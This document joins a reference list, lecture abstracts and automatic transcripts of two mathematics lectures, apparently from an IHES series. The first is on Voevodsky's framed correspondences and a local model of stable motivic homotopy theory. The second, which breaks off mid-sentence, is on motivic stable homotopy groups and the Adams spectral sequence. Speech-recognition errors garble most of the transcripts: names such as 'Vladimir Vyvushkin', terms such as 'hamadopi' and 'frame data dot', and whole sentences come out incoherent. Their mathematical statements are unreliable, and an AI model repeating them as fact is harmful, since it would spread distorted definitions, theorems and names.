Garkusha, I. Panin, Homotopy invariant presheaves with framed transfers, Cambridge J. Math. 8(1) (2020), 1-94. [4] G. Garkusha, I. Panin, Framed motives of algebraic varieties (after V. Voevodsky), J. Amer. Math. Soc., to appear. [5] G. Garkusha, I. Panin, The triangulated categories of framed bispectra and framed motives, arXiv:1809.08006. [6] V. Voevodsky, Notes on framed correspondences, unpublished, 2001, www.math.ias.edu/vladimir/publications
|
10.5446/50938 (DOI)
|
So thank you very much to Organizer, thank you very much to IHS for the opportunity to give this small series of talks on one of my favorite topics and let me start with. So Vladimir Vyvushkin in 6. So the number in is of papers and prepings is taken from the excerpt of my talk. So Vladimir Vyvushkin in 6 and then to the category of frame correspondences is a hope to give a new construction of the stable material metopathy theory that is more friendly for computational purposes. So in this conclusion we use frame correspondences to develop for a theory of frame models. The latter theory allowed us to give in 5. To give in 5. A genuinely local construction of SH. We can read from the three of my TV equipments is completely in my duchess I will recall definition of frame correspondences and will describe the genuinely local construction of the stage of a provided that the base you pay is infinite and filtered. I will also discuss the application and now let me probably pass to my first lecture. So here is actually one. Which couple of smooth varieties, why and X or K. And point it is crucial sets. This tool. X, K, S1 and frame data dot S1. Both of them are described in terms of how the bright variety. Here is a question. What can we state about the amount of the groups. The amount of the group of the classical topological space omega infinity of the circle. That is very covered the power of the space omega infinity as one, even if you need to find the same facial set. And the same table, which is described in terms of how the bright variety is only. This is one of the computational miracles of the frame correspondences. And one to we take dimension space dimension, some official set frame data dot X and the first one and take in the amount of the groups is kind of fine and efficient. And from other side we take the topological space X plan plus suspension and take the stable some other be group of this suspension with the more than three official where X is a smooth complex of the priorities and are in the language at least. So, the result is that these two groups. The same thing inside the latter is out is an extension to make it stable from a topic context, also see the break it's just in the real city stadium, stating the quality on the left, this equality. And then the S1 of the same visual scheme. And we take is homology is fine and efficient in order to end and on the right hand side we have a green the first suspension of space X plus smash of the space X plus and we take its usual single of homology is fine and efficient. And we have a certain sense, as I will explain below in lectures, this frame, three sentences stable frame, three responses is a very good replacement in this table, how much to be much in the context for the finite which are due to we was can replace a central rule in usual material business of the working in one three, that may be an infinite perfect field and maybe it's still extension. Not necessarily fine. Then for each smooth variety of okay and each up, which is a three zero. We can take from one side. This is a special space frame data dot capital comma extender S1 and take is ordinary. My TV space X plus matches one take its even suspension spectrum. Take the A1, automatically shift of weight zero of this spectrum and evaluate the shift on the field page. And state that the left hand side, can only create inside with the right hand side. So, this is, I will take back over my course. But the in the first lecture, I would like to formulate this here in Strapoli. So that I need to recall definition of stable frame correspondences and some other definitions which are you can read what's being. So let me do it. So, the notion of a type neighborhood of the neighborhood of the in the same as the is a close to the subset in S. So people W pi S satisfying the following condition conditions by the net time morphism. So, I precompose this as the insight with the inclusion the into S that is a close to the end and image with respect to pi of the inside with the image of the under the map under the map. Let me draw a picture to make the picture more definition of more things. So here is S. Here is Z. This is close to the gradient I. This is my W. And here is my. And here is my calling S. So, firstly, the diagram come use. As I told by the time the time come, they come to miss by precompose this is coincided with the closing begin. And there is also this condition that pi in the so Z coincide with S of Z. Very informally speaking, you could take a to be the complex numbers and replace a neighborhood by the strong neighborhood. And in this case, the picture will look as if you take S, take it close to Z. And say, close complex variety and then take a rather refined neighborhood in strong topology. This will be your W. With this, so I also like to say that that if you have another. A tiny little like this. Then a morphine between W prime and W between today because this which I have drawn is a muffin row between W prime and W such that this triangle is commutes particularly raw is automatically it. So with this in hand, I am able to give the major definition, which is due to we work here. Namely, a definition firstly of S with the prime correspondences of level and then definition of a frame correspondences of level. So, for case moves here and why and as an integer and which is that you and I did cram respondents by level and consist of the following data. So, it will subset the let me maybe draw this in a nice way. So, the data are the following. So, the in white cross K and this close upset is supposed to be fine. So, the close upset in white cross a and functions by one by and he says a morphine from you to a and such that the common vanishing book of this functions is the close upset Z in you. The subset Z will be referred as the support of the correspondence. We should also write triples, five like this or quadruples, five like that to denote explicit frame correspondences also one should say that frame correspondences to frame correspondences like Z by G. And the prime prime side. The two are called equivalent provided that the following condition calls the coincide with the prime. The final W such that G restricted to W coincide with G prime. The rest restricted to W and I restricted to W coincide with side restricted to W in this condition calls we call explicit frame correspondences to be equivalent. The second frame correspondence of level 10 is an equivalent class of explicit frame correspondences of level 10. And if a motivation for this definition, the second half of my lecture, we let frame and between between why and X, you know the set of frame correspondences from why X level 10. And you can see that it is appointed set with the base point being the class zero and of the explicit correspondence with you equal the empty scheme. And should mention that the set frame notes between why and X of correspondences of level zero, we decided with a set of pointed morphisms between Y plus and X plus. Next, we would like to define a composition of frame correspondences to get eventually a category of frame correspondences frame part of it. So to define composition frame correspondences take a frank respondents of level M and take a frank respondents of level M. And define the composition as as a frank respondents of level M plus M between why and S. So, here we go from y to X and here we go from X to S. So the composition is expected to go from y to S and this is the case. And we should take firstly, Z cross Z prime over X as the support of the respondents. This neighborhood is supposed to be you cross you prime over X. And here there is a closed embedded which is as close as S prime. And we have function or better say morphisms by cross psi from you cross you prime. And it's given by the family of functions by pre composed with a compulsive string of function by and say and what is a morphine from you cross you prime to S. And it is given like this closely project to your prime from here project to your prime. So, this way, we bought what we call the composition of brain correspondences of frame correspondences, which is the correspondence of level M plus M between why and S. So, it is not difficult to check that this composition of specific respondents respects the equivalence relation on them and define as such as a set of maps between frame and why to X and frame and X to S to frame M plus M by to S. And this in fact, we are ready to define our category of frame correspondences, namely, its objects, those of smooth varieties. And the morphisms are given by the sets frame plus plus like between why and X and what is frame plus of why to X. It is the book here. The book of frame and why to X alone. So, this category frame plus of pay is called the category of frame correspondences. And this also is a category frame note of pay, all this category frame plus of pay. It's all those most emotions are given by the set frame note. Why to X, which are pointed motion between why plus and X plus the category frame plus of pay as the zero object. The zero object is the empty scheme. But the same a friend pointed to receive is a free shift of point is set on on the category on the category frame plus of pay. And the same components. The composition of two frame correspondences in certain couple phases is taken in a very easy way, namely, if is another more between why prime and why. So, if the pie is a level and correspondence of this form. Then, by precomposed to the set is given by this simple formula. And also if you take morphine between two varieties, a more than a level zero, then H compose with five is given by this simple formula, namely, we precomposed H with G, and the rest is the same as for five. So, the category is defined, and it gives a good. A good opportunity to define the set of the set of stable frame of stable frame correspondences frame by two X. And for that, I need to recall one more. We was the definition, namely, given a case moves scheme X. The fish motion seem as open cold. The suspension in the direction. It is a morphine of several one from it's itself. It is defined by this episode frame correspondence. So here X cross not is the support. And it lies in X cross a one, the entire neighborhood is X cross a one itself. T is written for the projection to a one and projection to X is taken for G. So we need to take morphine morphine to X. And the morphine we take is the projection to X. So, which integer n, which is at least zero defined using this sigma X define a pointed set more than sigma capital X between level and frame correspondences to level and plus one frame correspondences. It takes a level and respondents five to sigma X, we can pull this fine explicitly sigma X takes a print respondents of level and all this form to the print respondents of level and all this form. The support is equal to zero. It's neighborhood is you cross a one. And there will be and plus one function, maybe the functions are the previous one by one by and the last function is the projection to the last. And the function G is replaced with the following one. We have a morphine G to X. And we can compose it with projection to you. Now we can give the definition of the set of stable frame correspondences between y and X. It is just a clean it. And the definition of this string. I should mention, which I did not that this sigma X, sigma capital X is an injection of pointed sets. This is an obvious to check. So, speaking we could take not a lot to speak in but exactly speaking this kind of need is just the union of mentioned pointed sets and it's called the set of stable frame correspondences. What I didn't mention about the pagodas let me mention this right now that for each frame correspondents step of level zero between X and X prime. There is this equality, which I will draw the picture of this form, we can take sigma X prime. We can take the composed with F and we can take a big composed with sigma X and this equality is in that the diagram comes. This is essential for what I will say right now. Namely, if F is frame correspondence of level zero, then the assignment, which takes five. To every composed with five define a frame pre shift morphism. A flow of star from the pre shift frame delta bar X to the pre shift frame delta bar X prime. Also, I would like to stress that this pre shift this pre shift they are also they are intact means new shifts by a limit you to be working. So, but what I would stress that there is this covariant morphine. This morphine defined by a correspondence of level zero between X and X prime. Particularly frame by bar X. So, as I told you, this frame bar X is a frame pre shift is a frame pre shift. Since it is a frame pre shift. Therefore, we can restrict it to the category smooth and we get a pointed pre shift on smoke. And since a post is a frame pre shift morphism, particularly it is a flow of star is appointed pre shift more morphism on smooth. So, let me go on the next. Namely, the nearest aim is to define these two simple shifts. Which I about them. I use them to formulate here in the beginning of my lecture. So, this is my nearest aim is to define this two simple sets. And for that, let him lower star, I will just pronounce in star with the category of finite pointed sets and pointed morphine and pointed max for a scheme X. So, I will write finite non pointed set a I will write X times a for the scheme. Like this, which is the co product of several many copies of X indexed by elements in a. I would stress that categories. Smash product and the unit object one plus and frame not of page, the Cartesian product cross and the object point, the unit object point, the symmetric monoidal categories. And there is a fully faithful and burden in taking a point is that they to the team of this form. The star is the distinguished point of pay. So taking the third page will him speak, say, then the capital minus the distinguished point and taking a morphine fight. So that is more business. So I didn't get the fight between the state capital and state capital. Maybe I should say here. Is everything okay. Yes, it's okay. Okay, I continue. Yeah, so I should should comment a little bit. So what I need to define is a morphine enough high, which belongs to morphine. Okay, between enough pay and enough pay. This is equal to pointed morphine set between seems in. Plus. And in. Okay. Plus. I specifically written down that the left hand side here is exactly the in pay plus. And right hand side here is exactly the in a plus. And what I need to do. So we have also this plus is me this equality and this plus is me this equality. So I need to take to specify a pointed pointed morphine between this team and this team. And I choose to take this morphine identity to the fight as the specification. It is a pointed motion. So this way, I defined this way, I defined fully faithful in bedding of the category in star into the category frame not okay. And I would stress that this one to eat in is strictly monoidal. The categories of simple show objects, frame, they're to do. Of simple objects. And in categories in star and frame not pay asymmetric monoidal in the standard way as well. So the fun to in in view to the fully faithful in bedding between these two categories, which are the categories of simple show objects in his time in the star and in frame not okay. The latter is strictly monoidal. And the last couple of notation. Let x dot be in the top frame not okay. And that a dot be in the top of the star appointed to official set. So in the category of. Right. Exdote tensor k. K dot for the object. Exdote close in of a dot. I recall that in a pay dot is already an object in this category. The cross product is monoidal. So explicitly. Exdote. And we like to take it and synthesis. It will be. Sorry. So this will be. No, this is just a scheme. Exdote cross. And I also will write k dot for the object in of k dot in the top frame not okay. Particularly for the simple circle as one. Which is a simple shell object in the category category. And the same acts, which is smooth. We have objects. And the same that is one. So since the pointed set frame. The same correspondence between why and why prime is a covariance is covariance. We get pointed simple shell sets frame y comma x and this one and frame y comma s one. This is due to this covariance. And this is due to this covariance. And this is due to this covariance. Now replacing by the standard course in official scheme. Frame data dot. We get the simple show sets. That we do not also frame data dot x and the response and break data dot. So this simple shell sets. I will be fine eventually and games 1112 and 13 are stated properly now. I would say that this is the end of. First part of my first lecture. And I have about 15 minutes. Little bit more for the second part of my lecture. The second part of my lecture has subtitle. Namely, my TV function of the signal here and the meaning of this simple show set. Of this simple show. Sheep. Which is. Indeed. A ship is in the show. So. Consider now. Which is a one more. For a point in my TV space. Like this for the. And he suspension of M. And he will write. For the. So there is a remarkable way was the lemma, which is a very key for this topic. Which I decided to formulate in this form, which is a little bit unusual, but it is a logical equivalent to the real ski to the original. Namely, this. Magic. And similarly, the shift of print responsibilities. Like this. As on the left hand side, we could take the clean it. And so on the right hand side, right hand side is defined as the night code limit of. And of this form, which are my key for spaces of this form, due to this. Place a fundamental rule role in the stable material. Right below, I will make this stages, a bit more precise. But before I would like to stress. Namely, the fun to X. Most of him of the top dot. But. S makes all the stable material to be here local. This principle will be specified in the second lecture. This is quite the same. The front x takes to go to the core delta dot cross bar, comma X. So this is the motive of X. The real skill of X makes the real ski theory of motive local. So, in certain sense, this simple shell shift in certain sense, not in a very precise sense, either substitute for M of X. At least this construction is very close to this one. Let us consider now the calling picture. Take on the left hand side. Take on the left hand side point of my two experiences and on the right hand side, take even step. Not a topic category, but just the category of given spectrum category of a point of my two spaces. One is the infinite suspension factor is respect to one and another one is the naive omega infinity to one look. They are to be joined each to the other. This is the left one. These two factors induces the corresponding direct contest a one direct contest. Between the pointed unstable material category H of k and the stable material category SH of k. The left hand side is still the infinite suspension. And the right hand side is the one direct to one look. So, shortly, I prefer to write on the infinity one for this direct. One of the major tasks of the stable material material is to compute the material space like this. Where X is the smooth variety. A similar task in top logic has been solved by the single machinery. The Matic version of the single theorem. Let k be an infinite perfect field. With the non- FIROF- naviken! And I should take this mesh robot. Omega infinity p1, sigma infinity t of x plus six one. Such a canonical morphism exists due to the fact that on the left hand side, we take the naive omega looks. And on the right hand side, we take a1 derived p1 looks. So it's naturally to expect that there is such an error and this error exists. And it states that this canonical error is a local theorem. Particularly, let k capital over k be a field extension, not necessarily finite. Then this morphism we evaluate on the field k capital and on the left hand side, and you'll get a weak equivalent of the initial sets. On the left hand side, we have the same visual set frame delta dot k capital comma x times x one. And on the right hand side, we have the, I should not shoot as one. Omega infinity p1, sigma infinity t of x plus mesh s1 evaluated on k. So this is a martyric space. So this is a shift. You can evaluate it on the field k capital and get a simple set. So the server is a VP period, VP period of some crucial sets. This theorem has a very nice and strong theory. Namely, if you take a to be the complex numbers and we take x to be the point, then the hamadopi group, hamadopi groups of this simple set, which is frame delta dot comma s1 coincide with the stable hamadopi group of the classical circle s1. Let me derive this category from the theorem. So firstly, this simple set is weakly equivalent to this simple set by, because this error is a weakly equivalent of simple set. So this is the true equality. The second equality calls by the very definition of the infinite loop p1 loop, a1 hamadopi loop, or by the very definition of a1 hamadopi group of this vector. So what is on the right-hand side? On the right-hand side are the following group. We take the suspension, the T suspension spectrum of s1. We take the a1 hamadopi shape of weight zero, weight zero. This is a shift, and this shift we evaluate on the complex numbers. So this equality calls up to the, by the very definition as I told of this function. And the last equality is a very deep theorem due to my theory. It says that a1 weight zero, a1 hamadopi shape of say, s1, particularly of s1, evaluated on complex numbers coincide with the corresponding stable hamadopi group in topology. So s1 topological. So, and eventually I would stress that this corollary has a stronger form, namely, that the space, the simplicial space, the frame delta dot s1 is weakly accurate to the topological space, omega s1 infinity, sigma s1 infinity of the usual topological circle. So, a kind of conclusion, is this, that the usual topological space, omega infinity, sigma infinity of s1 top, is expressed as this simplicial set, which is defined in terms of algebraic varieties only. And also, since I have a couple more minutes, I will take back to my faces. Yeah, this one. Same that this construction plays a central role in the stable mativic hamadopi theory, and it plays a central role due to the fact that up to some extent, it makes all the stable mativic hamadopi theory local. And in the second lecture, this principle will be specified, but let us say clarified. So, we will make this principle quite precise. Thank you very much. This is the end of my first lecture. Thank you very much. Thank you for a very nice lecture. Maybe I can post the first question. Okay. Just a second. Yeah. So, yes. Let's go to theorem 110. 110? No, okay. Yeah, yeah, yeah. Okay, go. Yeah. Yes, I should put here, as I already had done, I should put here, smash as well. Okay. Can you get the maps in that theorem? Yeah. Yeah. Okay. Yeah. Yeah. Yeah. Okay. Yeah. Yeah. Yeah. Okay. Okay. I would like to say only very few people already. And then a bit roughly. So, as I told, this is on the left hand side, and here is and here is and here is sigma infinity Okay. So, from the infinity, we have a pretty obvious map to here. This just a transformation of omega naive, a transformation of omega naive to infinity, Yeah, it gives enough. So, is it okay? Yes, thank you. Thank you. Any other questions? Use a mic. Sorry. Can you explain it a little bit why you need K infinite in theorem 110? Yeah, in theorem 110. So, this theory of I would say which is behind of the theorem is written down in published papers for infinite field and for field which is finite, there is there are some reference due to the Georgian and Paul help me please. You can form a Ph.D. student. Jonas. Yes. And you to Jonas. Yeah, but which is prep and still, prep and still in the prep and form. I mean, surely one can replace K by I mean, eliminate in and say take any. It doesn't seem to be any other questions. One else. I think it means that your lecture was accepted. Thank you. Thanks a lot.
|
V. Voevodsky [6] invented the category of framed correspondences with the hope to give a new construction of stable motivic homotopy theory SH(k) which will be more friendly for computational purposes. Joint with G. Garkusha we used framed correspondences to develop the theory of framed motives in [4]. This theory led us in [5] to a genuinely local construction of SH(k). In particular, we get rid of motivic equivalences completely. In my lectures I will recall the definition of framed correspondences and describe the genuinely local model for SH(k) (assuming that the base field k is infinite and perfect). I will also discuss several applications. Let Fr(Y,X) be the pointed set of stable framed correspondences between smooth algebraic varieties Y and X. For the first two applications I choose k = ℂ for simplicity. For further two applications k is any infinite and perfect field. (1) The simplicial space Fr(∆alg,S^1) has the homotopy type of the topological space Ω∞Σ∞(S^1_top). So the topological space Ω^∞S1Σ^∞_S1(S^1_top) is recovered as the simplicial set Fr(∆alg,S^1), which is described in terms of algebraic varieties only. This is one of the computational miracles of framed correspondences. (2) The assignment X ↦ π(Fr(∆alg,X⨂S^1)) is a homology theory on complex algebraic varieties. Moreover, this homology theory regarded with ℤ/n-coefficients coincides with the stable homotopies X ↦ π ^S_(X+^S^1_top;ℤ/n) with ℤ/n-coefficients. The latter result is an extension of the celebrated Suslin–Voevodsky theorem on motivic homology of weight zero to the stable motivic homotopy context. (3) Another application of the theory is as follows. It turns out that π^s_0,0(X+) = H0(ℤF(∆,X)), where (ℤF(∆,X)) is the chain complex of stable linear framed correspondences introduced in [4]. For X = G_m^^n this homology group was computed by A. Neshitov as the nth Milnor–Witt group K_n^MW (k) of the base field k recovering the celebrated theorem of Morel. (4) As a consequence of the theory of framed motives, the canonical morphism of motivic spaces can: C_Fr(X) → Ω^∞ℙ^1 Σ^∞_ℙ^1 (X+) is Nisnich locally a group completion for any smooth simplicial scheme X. In particular, if CFr(X) is Nisnevich locally connected, then the morphism can is a Nisnevich local weak equivalence. Thus in this case C_Fr(X) is an infinite motivic loop space and π_n(C_FR(X)(K)) = π^A1_n,0 (Σ^∞_ℙ^1 (X+))(K). In my lectures I will adhere to the following references: [1] A. Ananyevskiy, G. Garkusha, I. Panin, Cancellation theorem for framed motives of algebraic varieties, arXiv:1601.06642 [2] G. Garkusha, A. Neshitov, I. Panin, Framed motives of relative motivic spheres, arXiv:1604.02732v3. [3] G. Garkusha, I. Panin, Homotopy invariant presheaves with framed transfers, Cambridge J. Math. 8(1) (2020), 1-94. [4] G. Garkusha, I. Panin, Framed motives of algebraic varieties (after V. Voevodsky), J. Amer. Math. Soc., to appear. [5] G. Garkusha, I. Panin, The triangulated categories of framed bispectra and framed motives, arXiv:1809.08006. [6] V. Voevodsky, Notes on framed correspondences, unpublished, 2001, www.math.ias.edu/vladimir/publications
|
10.5446/50948 (DOI)
|
Okay, so let me first of all say that I really very much appreciate the effort that the organizers and also that IHES have put into converting this event into a virtual format. We all know that this is not the style of event that we were hoping for, that we were wishing for, but I think it's really important that all of us at all levels of our society under these circumstances do the best in the circumstances that we have, even if those efforts are not ideal. Okay, so let's go ahead and get to work. So I'm going to talk over the next three hours about stable homotopy groups. So let me begin with some background, mostly classical about the stable homotopy groups and why these are things that we should care about computing. So S0, this is the name of the unit object in the stable homotopy category. And it's the unit object in the sense that if you smash any spectrum X with S0, you just get X back again. So it's the unit of that object and the stable homotopy groups are basically by definition, they are the graded endomorphisms of S0. They're the graded endomorphisms of the unit object. That's what we're talking about. And as we know from many examples, the endomorphisms with the unit object control the structure of the entire category. So these pi star actions, these actions by the endomorphisms have a lot to do with the structure of the entire category. So for one very concrete example, we could think about the class of two cell complexes. So two cell complexes are the of the spectra that you get by taking a sphere, a sphere spectrum, mapping it to another sphere spectrum, and then taking the cofiber. And then this SK, that's the shift of this one to begin with. So these two cell complexes X, of course, they're in correspondence with the elements of pi star. There's this map that you took the cofiber up to get X. So if you want to classify two cell complexes, you have to compute the stable homotopy groups. So that's one very naive way in which these elements of pi star tell you about other parts of the category. And so you might want to take this example of two cell complexes and extend it further. So what about, and in general, finite cell complexes are very much related to the structure of pi star, but in a more complicated way, more sophisticated way. So let's take a look at, as an example of that, let's take a look at a three cell complex. So I've drawn a picture over here on the left, which is sort of a schematic of what I want to do. I want to have a, I want to build a complex, right, and it should have S mod beta. It should have the two cell complex associated to beta as a sub complex at the bottom. And it should have the two cell complex associated to alpha as a quotient at the top. That's what this picture means sort of schematically. And so you can do this sometimes. Sometimes you can build a three cell complex where the bottom two cells are S mod beta and the top two cells are S mod alpha. However, it turns out there's an obstruction, you need a condition. And that condition is that you need the product alpha times beta or the composition alpha times beta as endomorphisms of S mod, an endomorphism of the unit object. That composition needs to be zero. That turns out to be an obstruction to constructing such a three cell complex. And then you could go further from this three cell complex and you could ask about, well, what about a four cell complex? So four cell complex, so the schematic looks is like this picture I've got over here on the left. Okay. And again, the idea is that we're building a four cell complex. It should have a certain three cell complex as a sub complex and a certain other three cell complex as a quotient, right? And so, and those quotients are going to be alpha, beta, and gamma, okay? So we already know from the previous example that you have to have that alpha, beta is zero in order for that top three cell complex to exist. And we also know that beta times gamma has to be zero for that bottom three cell complex to exist, okay? And then it turns out there's an additional obstruction. There's another obstruction to actually putting all of these things together into a single four cell complex. And that has to do with the Tota bracket alpha, beta, gamma, okay? You need this Tota bracket to vanish or at least to contain zero. Okay. So I haven't told you what a Tota bracket is, okay? And we will get later in these talks. We will get into a little bit of this sort of these sort of higher operations, this higher structure that one needs to study here, okay? But we won't be probably too precise about that. The point I want to emphasize here is that there's higher structure that you need to know about to solve sort of real tangible problems, okay? And then you can try to take this sort of cell complex idea to an extreme, right? And maybe now I've looked at some, what, you know, sort of a very much more complicated type of cell diagram, whatever this even means, right? And you could ask whether you can form a cell complex of this type over here on the right. And then it turns out, you know, there are some obstructions, right? What are the obstructions? Well, you know, to constructing this thing. And it turns out that there are, but they involve something that maybe you would call mixed length brackets that get even more complicated, okay? So on the one hand, this higher structure, like for example, in the four cell complex situation, on the one hand, this four cell complex, this higher structure does a very nice job of understanding how four cell complexes exist, but also things kind of get spiral out of control fairly rapidly when you try to study the general situation. And this is more or less equivalent to the fact that the stable homotopy groups are complicated and the stable homotopy category is complicated, and we wouldn't expect there to be necessarily a simple classification of arbitrary finite cell complexes. Okay, so here's the conclusion that I'd like to draw from these examples and from this sort of discussion. First of all, the most important thing, that pi star is not just a graded abelian group. It is a graded abelian group, okay? But it's much more than that, okay? It's also a graded commutative ring because you can compose endomorphisms, okay? But it's much more than a graded commutative ring as well, okay? The higher structure is an indispensable part of the structure of pi star, okay? You haven't really understood pi star unless you've understood all of this higher structure, okay? And that's something that people who, you know, spent time making explicit computations of stable homotopy groups spend a lot of time worrying about this higher structure, digging into it because it reveals so much of what's going on. Okay, and we'll talk about that higher structure at various points along the way. Okay, so everything I've said so far was sort of background motivation about classical stable homotopy theory, okay? And let me point out that much of this same story applies just as well in motivic or equivariant or other contexts, okay? The motivic stable homotopy groups or the equivariant stable homotopy groups will control finite cell complex constructions in those contexts as well, okay? However, there's an important caveat here, especially in the motivic context, right? Which is that not every motivic object is built out of cells, okay? It's cellular in the sense of built out of spheres. And so these stable homotopy groups are good for the cellular objects, but they're not necessarily so good for other types of objects, okay? The good news is that many of the most important motivic objects like the algebraic k-theory spectra, the island bearing McLean spectra, or the co-bordison spectra and so forth are cellular, okay? So it's still, so studying the cellular objects is, motivically, is still a worthwhile thing, okay? All right, so let's talk a little bit about sort of like the background about the contexts in which we're going to be working, okay? So in the upper left corner, I've got a little diagram here, right, of four categories and four functors, okay? In the upper left corner, I have the R-motivic stable homotopy category, okay? And then in the lower left corner, I have the C-motivic stable homotopy category. And those two categories, of course, are connected by the extension of scalars' functor, right? Okay? And then in the upper right corner, I have the C2-equivariant stable homotopy category. And in this situation here, C2 is really the Galois group of C over R. That's going to why it's C2 as opposed to some other group, okay? And Bette realization maps, goes from R-motivic homotopy to C2-equivariant homotopy, okay? Every R-motivic spectrum has sort of an underlying C2-equivariant spectrum, and that C2 action is the Galois action, right? Okay? And then finally, in the lower right corner, I have the classical stable homotopy theory, okay? And stable homotopy category. And then that receives functors, the forgetful functor from C2-equivariant, just forget the C2 actions, okay? And then, of course, the Bette realization from C-motivic homotopy theory, okay? So these four categories fit together very nicely, and these, we should think of these functors as being sort of very well-behaved computationally. We can really kind of understand them if we set our minds to it, okay? So the program that I'm proposing or I'm working on is that we should be working, we should be computing in all four of these contexts simultaneously, okay? Because the way they relate along these functors tells us a lot of information that the situation becomes much more rigid and much more easy to understand if we actually do all of these at once, okay? We're also going to consider k-motivic stable homotopy groups for some sort of general class of fields, k, all right? But maybe in less detail than the r-motivic and the c-motivic cases, okay? So let me defend that choice here. But let me defend that choice for a minute of why focusing on the r-motivic and c-motivic cases rather than the general field, okay? So the point for me is that the r-motivic and the c-motivic cases are the ones that are most closely related to classical homotopy theory, to classical topology, okay? So if you want to learn something about classical topology or if you want to borrow tools from classical topology, then the r-motivic and the c-motivic cases are the places where you're most likely to be effective, okay? So there's that, okay? But also, maybe even more importantly, the r-motivic and the c-motivic cases are more accessible and so they're important tests for general theory, okay? And a great historical example of that is what happened over the last few years with Ada periodic homotopy, okay? So Ada, motivically the element, the half map Ada, is not nilpotent and we'll talk more about that in computational detail later, okay? But it's not nilpotent, which means you could invert it and still have something non-zero, okay? So you invert your Ada, okay? And you see what you get, you compute what you get, okay? And there was a series of projects with Berke you and myself, Andrews and Miller, Glenn Wilson, Kyle Ormsby, Oliver Rundigs, Tom Bachman, Mike Hopkins, and where we started, at the beginning of this series, we started looking at the c-motivic computations and we figured out what happened there. And then we went to the r-motivic computations and we figured out what happened there. And that led to ideas about what the general picture should look like over the rationals and then over general fields, okay? So there was this progression from specific cases that gave us hints about the general theory to the general case, okay? And that's exactly the way it played out. And so that's just sort of an important principle here and why we want to work through. All I'm saying here is we should do the easy cases first, right? That somehow summarizes this whole point. Okay. So let me make some comments about sort of standing assumptions and in general sort of philosophy for the series. Okay, so first of all, I'm always working stably. I may not always say stable homotopy or stable homotopy group or stable homotopy category, but I always mean stably. Everything we're going to do here is stably, okay? Lots of stuff are going on, lots of stuff going on here, unstable in motivic homotopy here, but that's not the subject of these talks. Okay, question. Are there other motivic fracture squares analogous to the real and complex version? So I think what, okay, so I think what's being asked there is that back to this upper left square, are there analogous squares like this for other fields? And the answer, if I understand the question correctly, I would say the answer really is no, right? There's something very special about the real numbers and the complex numbers and the way they relate to ordinary topology. One could try to do things with the at all homotopy types and so forth over general fields and that would probably, you know, and then general Galois groups and that would probably be a fairly interesting thing to do. But of course, there's all that complicated technology, pro technology that has to go into that sort of thing. And I don't know how like say computational that would necessarily be. Okay. So that's pro, but working out, you know, those ideas is probably, and a lot of those have been worked out, right? It's probably, you know, it's probably a worthwhile thing. Okay. And the other question is for the C2, Aquavariance, is this naive, Aquavariant? No, I mean the so-called genuine Aquavariant theory. I'm thinking about representation spheres and stabilizing with respect to all representation spheres. Okay. All right. Okay. So we're always working stably. Usually we'll have completed it at a prime. Okay. And usually that prime will be two. Okay. There are some places, some parts where things work integrally, but if you're going to do computations as a general rule, you have to work one prime at a time. That's just the price you pay for actually getting compute explicit computations out of things. Okay. And, you know, and there are ways of reassembling all this, you know, this primary data into, you know, integral stuff with, you know, with all the usual sort of like technology. Okay. The other standing is another standing assumption that I'm going to make is that I'm studying the stable homotopy groups here. There's another perspective on what sort of like these, the fundamental invariance of the motific homotopy category is, and that uses the idea of studying homotopy sheaves. Okay. And the, and the, the homotopy sheaves are more powerful in that they can then help you study objects that are not cellular. And so you can do much more interesting geometry and arithmetic with them. The downside of course is you, you lose a certain amount of explicit computational ability when you're working with these abstract sheaves. Okay. And the relate the connection between them is that the homotopy groups that I'm studying are the global sections of the homotopy sheaves. Okay. So that's what we're going to be talking about. Okay. And I sort of, as I already alluded to before, we will complete as necessary to make whatever spectral sequence we're studying will complete as necessary to make that thing converge. That might mean completing at a prime P that might mean completing at that hop also completing at the half map Ada. You might have to do something where you take the effective completion of a spectrum and so on and so forth. Okay, so I am not going to make a big deal about this out of this completion stuff. Okay. Generally speaking, it, it, there is some work to be done about these convergence issues and about the behavior of these completions. And typically this work is manageable. Okay. It's not trivial, but it's manageable. Right. And so we can get these spectral sequences to converge in in reasonably nice ways. Okay. My job is not to worry about the convergence. My job is to sort of figure out what the computations are. Right. And so that's what we'll talk about. Okay. Question. Is it then known that about a homo, what about a homotopy sheaf version of the Motivic Adams spectral sequence? So that is a good question off the top of my head. I have never thought that through maybe some other people here have some idea that my instinct tells me that it would, that it should work just fine. The problem is that in abstractly, you should be able to set up such a thing just fine. That might, however, it's not at all clear that you're going to be able to make this sort of fundamental computations to get things off of the, off of the ground. Okay. And then sort of related question there. What you lose specifically when you work with the homotopy sheaves is that you, that, that maybe the spectral sequences exist, but there's, there's sort of the, there's another thing that you need besides the existence of the spectral sequence. The other thing you need is some input computations that you have to start with. Right. And so what, for example, when you're thinking about the Adam spectral sequence, and we'll get to this in a little bit, but so this is a little bit of a preview. But when you think about the Adam spectral sequence, you can set it up abstractly, but that's only useful if you know what the Colm Algebra point is and you already know what the Steering Algebra is. If you have no idea what the Steering Algebra is, right, then the Adam spectral sequence is nothing more than an abstract toy. Okay. So that's the problem with, with, with the sheaves, right? If you're going to sort of work with the sheaves, you're probably going to, I don't, I, I don't know, I don't want to speculate right here live about what you're going to need, but, but I have a feeling that those sort of those input computations are, are, are just kind of like, you know, not really things you can write down. Okay. All right. So we'll complete as necessary. And then finally, one last comment here about, just about notation is that the grading convention that I will adopt is, you know, in this form P comma Q, this is the, this is the grading convention that Bavadski used. P is like the topological degree. Q is the motific weight. And then P minus Q is some, is frequently a quantity that one wants to study and, and I'll call that the co-weight. Okay. Because it's sort of a partner to sort of a partner sort of dual in a sense to weight. Okay. And this does not agree with the notation that all authors have used on the, in the subject, but it's the one that I'll stick with. Okay. Consistently. All right. So even before we get, we are certainly headed for the atom spectral sequence. That is the sort of like the first big tool that we're going to use. But even before we get to the atom spectral sequence, let's do, let's go back to sort of like prehistory even before that, before the atom spectral sequence was used to study stable homotovic groups, there were some more geometric constructions, okay, that, that work in sort of very low degrees. Okay. So what about that style of, of, of constructing stable homotovic elements? Okay. So, and some of these ideas are due to, many of these ideas are due to Morrell. Some are written down by Duggar and myself, and then who in Creole as well have contributed, contributed at various points along this way. Okay. So these geometric constructions, the good thing about these, these constructions is that they are universal. Okay. They work over spec Z and therefore automatically are going to work in sort of over any base. Okay. In the, in the motivic context over any base. Okay. All right. So the first element that I want to discuss is the element row. Okay. In pi minus one minus one. Okay. So this element row can be constructed. You take plus or minus one and you complete it, conclude it, include it into GM. Okay. And just as a matter of notation, GM here, I just mean a one minus zero. Take the affine line, I puncture it, and then that's GM. That's, you know, for the multiplicative group, whatever, 